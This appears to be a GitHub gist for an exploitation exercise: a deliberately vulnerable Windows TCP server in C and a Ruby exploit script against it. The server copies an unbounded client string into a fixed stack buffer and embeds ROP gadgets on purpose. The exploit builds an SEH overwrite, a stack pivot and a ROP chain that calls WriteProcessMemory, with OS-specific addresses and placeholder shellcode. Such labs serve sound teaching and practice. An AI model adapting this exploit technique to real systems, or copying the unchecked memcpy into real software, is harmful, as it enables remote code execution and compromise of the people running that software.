Created
September 6, 2012 12:05
-
-
Save abhisek/3655533 to your computer and use it in GitHub Desktop.
PingPing Vulnerable Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef _CONFIG_H | |
#define _CONFIG_H | |
#define CFG_SRV_PORT 8389 | |
#define CFG_MUTEX TEXT("BatMan") | |
#define CFG_SRV_FLAG TEXT("-booyah") | |
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <tchar.h> | |
#include <winsock2.h> | |
#include <strsafe.h> | |
#include "Config.h" | |
#pragma comment(lib, "ws2_32") | |
//#define __DEBUG | |
#ifdef __DEBUG | |
#define DMSG(x) do { MessageBoxA(NULL, (x), ("MSG"), MB_OK); } while(0) | |
#define DMSG_V(x, ...) do { \ | |
CHAR __dmsg_str[1024]; \ | |
StringCbPrintfA(__dmsg_str, sizeof(__dmsg_str), x, __VA_ARGS__); \ | |
MessageBoxA(NULL, __dmsg_str, "MSG_V", MB_OK); \ | |
} while(0) | |
#define DMSG_VW(x, ...) do { \ | |
TCHAR __dmsg_str[1024]; \ | |
StringCbPrintf(__dmsg_str, sizeof(__dmsg_str), TEXT(x), __VA_ARGS__); \ | |
MessageBox(NULL, __dmsg_str, TEXT("MSG_VW"), MB_OK); \ | |
} while(0) | |
#else | |
#define DMSG(x) do { } while(0) | |
#define DMSG_V(x, ...) do { } while(0) | |
#define DMSG_VW(x, ...) do { } while(0) | |
#endif | |
static VOID RopGadget1() | |
{ | |
__asm { | |
//int 3 | |
jmp bb | |
add esp, 0x500 | |
ret | |
mov eax, esp | |
ret | |
mov [esp], eax | |
ret | |
mov dword ptr [esp + 20], eax | |
ret | |
mov dword ptr [esp + 20], 0x500 | |
ret | |
bb: | |
nop | |
} | |
} | |
static VOID ProcessClient(SOCKET sock) | |
{ | |
HANDLE hFile; | |
DWORD dw; | |
CHAR szTimeStamp[2048]; | |
CHAR *ptr; | |
static CHAR szBuffer[4096]; | |
static DWORD __ebp1; | |
static DWORD __ebp2; | |
// foooooo | |
/*__asm { | |
mov eax, [ebp] | |
mov __ebp1, eax | |
}*/ | |
DMSG("Processing client socket"); | |
if(send(sock, "PING\r\n", 6, 0) == SOCKET_ERROR) | |
DMSG("Failed to send data"); | |
ZeroMemory(szBuffer, sizeof(szBuffer)); | |
ZeroMemory(szTimeStamp, sizeof(szTimeStamp)); | |
if(recv(sock, szBuffer, sizeof(szBuffer) - 1, 0) != SOCKET_ERROR) { | |
ptr = strstr(szBuffer, " "); | |
if(ptr) { | |
ptr++; | |
__try { | |
memcpy(szTimeStamp, ptr, strlen(ptr)); | |
} | |
__except(EXCEPTION_EXECUTE_HANDLER) { | |
DMSG("Exception triggered while memcpy"); | |
} | |
hFile = CreateFile(TEXT("ts.log"), GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, | |
0, OPEN_ALWAYS, 0, 0); | |
if(hFile != INVALID_HANDLE_VALUE) { | |
WriteFile(hFile, szTimeStamp, strlen(szTimeStamp), &dw, 0); | |
CloseHandle(hFile); | |
} | |
} | |
} | |
closesocket(sock); | |
/* | |
__asm { | |
mov eax, [ebp] | |
mov __ebp2, eax | |
} | |
if(__ebp1 != __ebp2) { | |
DMSG("Corrupted EBP"); | |
ExitProcess(0); | |
}*/ | |
} | |
static INT SrvCore() | |
{ | |
WSADATA ws; | |
SOCKADDR_IN sin; | |
SOCKADDR_IN cin; | |
SOCKET SrvSock; | |
SOCKET CltSock; | |
INT i; | |
if(WSAStartup(MAKEWORD(2,2), &ws)) { | |
DMSG("Failed to initialize Winsock"); | |
return -1; | |
} | |
SrvSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); | |
if(SrvSock == INVALID_SOCKET) { | |
DMSG("Failed to create socket"); | |
return -1; | |
} | |
sin.sin_addr.s_addr = inet_addr("0.0.0.0"); | |
sin.sin_family = AF_INET; | |
sin.sin_port = htons(CFG_SRV_PORT); | |
if(bind(SrvSock, (SOCKADDR*) &sin, sizeof(sin))) { | |
DMSG("Failed to bind port"); | |
return -1; | |
} | |
listen(SrvSock, 50); | |
while(TRUE) { | |
CltSock = accept(SrvSock, (SOCKADDR*) &cin, &i); | |
if(CltSock == INVALID_SOCKET) { | |
DMSG_V("Failed to accept connection (%d)", WSAGetLastError()); | |
Sleep(1000); | |
continue; | |
} | |
ProcessClient(CltSock); | |
} | |
return 0; | |
} | |
static INT SrvMonitor() | |
{ | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; | |
TCHAR szExe[MAX_PATH + 1]; | |
TCHAR szCmdLine[MAX_PATH + 32]; | |
/* | |
CHAR szCreds[1024], *p; | |
HANDLE hFile; | |
HANDLE hToken, hProcess; | |
DWORD dw; | |
LUID luid; | |
TOKEN_PRIVILEGES tp; | |
hFile = CreateFile(TEXT("cred.txt"), GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); | |
if(hFile == INVALID_HANDLE_VALUE) { | |
DMSG("Failed to open cred file"); | |
return -1; | |
} | |
ZeroMemory(szCreds, sizeof(szCreds)); | |
ReadFile(hFile, szCreds, sizeof(szCreds), &dw, 0); | |
CloseHandle(hFile); | |
p = strstr(szCreds, ":"); | |
if(!p) { | |
DMSG("Invalid cred file format"); | |
return -1; | |
} | |
*p++ = '\0'; | |
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | | |
TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | | |
TOKEN_READ | TOKEN_WRITE, &hToken)) { | |
DMSG("Failed to open current token"); | |
return -1; | |
} | |
if(!LookupPrivilegeValue(0, SE_DEBUG_NAME, &luid)) { | |
DMSG("Failed to lookup token priv"); | |
return -1; | |
} | |
tp.PrivilegeCount =1; | |
tp.Privileges[0].Luid =luid; | |
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; | |
//DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, 0, SecurityIdentification, TokenPrimary, &hToken); | |
if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), 0, 0)) { | |
DMSG("Failed to adjust token priv"); | |
return -1; | |
} | |
if(!LogonUserA(szCreds, ".", p, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken)) { | |
DMSG_V("Failed to logon server user (%s:%s): %d", szCreds, p, GetLastError()); | |
return -1; | |
} | |
*/ | |
ZeroMemory(szExe, sizeof(szExe)); | |
GetModuleFileName(0, szExe, MAX_PATH - 1); | |
DMSG("Entering server monitor loop"); | |
while(TRUE) { | |
DMSG("Starting process"); | |
StringCchPrintf(szCmdLine, MAX_PATH + 32 - 1, TEXT("\"%s\" %s"), szExe, CFG_SRV_FLAG); | |
ZeroMemory(&si, sizeof(si)); | |
ZeroMemory(&pi, sizeof(pi)); | |
si.cb = sizeof(si); | |
if(!CreateProcess(0, szCmdLine, 0, 0, FALSE, 0, 0, 0, &si, &pi)) { | |
//if(!CreateProcessAsUser(hToken, 0, szCmdLine, 0, 0, FALSE, 0, 0, 0, &si, &pi)) { | |
DMSG_V("Failed to create process: %d", GetLastError()); | |
Sleep(5000); | |
} | |
WaitForSingleObject(pi.hProcess, INFINITE); | |
Sleep(1000); | |
} | |
return 0; | |
} | |
int APIENTRY wWinMain(HINSTANCE hInstance, | |
HINSTANCE hPrevInstance, | |
LPTSTR lpCmdLine, | |
int nCmdShow) | |
{ | |
RopGadget1(); | |
if(lstrlen(lpCmdLine) > 0) | |
return SrvCore(); | |
else | |
return SrvMonitor(); | |
//SrvCore(); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'socket' | |
$base = 0x01401010 | |
$vars = { | |
:winxp_sp2 => { | |
:off => 0x100, # ROP gadget [esp + 500h] / ret lands us here in ROP stack | |
:wpm => 0x7c802213, # WriteProcessMemory | |
:fic => 0x7c8355d4 # FlushInstructionCache | |
}, | |
:win2k3_sp2_dc => { | |
:off => 0x108, | |
:wpm => 0x77e42365, | |
:fic => 0x77e73347 | |
} | |
} | |
$os = :winxp_sp2 | |
def get_off | |
$vars[$os][:off] | |
end | |
def get_wpm | |
$vars[$os][:wpm] | |
end | |
def get_fic | |
$vars[$os][:fic] | |
end | |
def get_shellcode(size) | |
sc = "\xcc" + ("K" * 512) | |
raise "Error" if sc.size > size | |
("\x90" * (size - sc.size)) + sc | |
end | |
def get_rop() | |
[ | |
0x0140146C, # mov eax, esp / ret | |
0x01401465, # add esp, 500h / ret | |
].pack('V*') + | |
get_shellcode(0x500) + | |
[ | |
0x01401473, # mov [esp + 16 + 4], eax / ret | |
0x01401478 # mov [esp + 16], 500h] / ret | |
].pack('V*') + | |
[ | |
get_wpm, # WriteProcessMemory | |
get_fic, # FlushInstructionCache | |
0xffffffff, # handle | |
$base, # addr to write | |
0x45454545, # addr to read | |
0x46464646, # bytes to read | |
$base # bytes written | |
].pack('V*') + | |
[ | |
$base + 4, | |
0xffffffff, | |
$base, | |
0x01010101 | |
].pack('V*') | |
end | |
if __FILE__ == $0 | |
sock = TCPSocket.new("127.0.0.1", 8389) | |
sock.recv(10000) | |
buf = "HELLO " | |
buf << "J" * get_off() | |
buf << get_rop() | |
buf << "B" * (0x80c - buf.size + 6) | |
buf << "ZZZZ" # (SEH Chain) | |
buf << [0x01401465].pack('V') # (SEH handler) stack pivot | |
buf << "\x90\x90\x90\x90" | |
buf << "\x90\x90\x90\x90" | |
buf << "C" * (5000 - buf.size) | |
sock.send(buf, 0) | |
sock.close | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment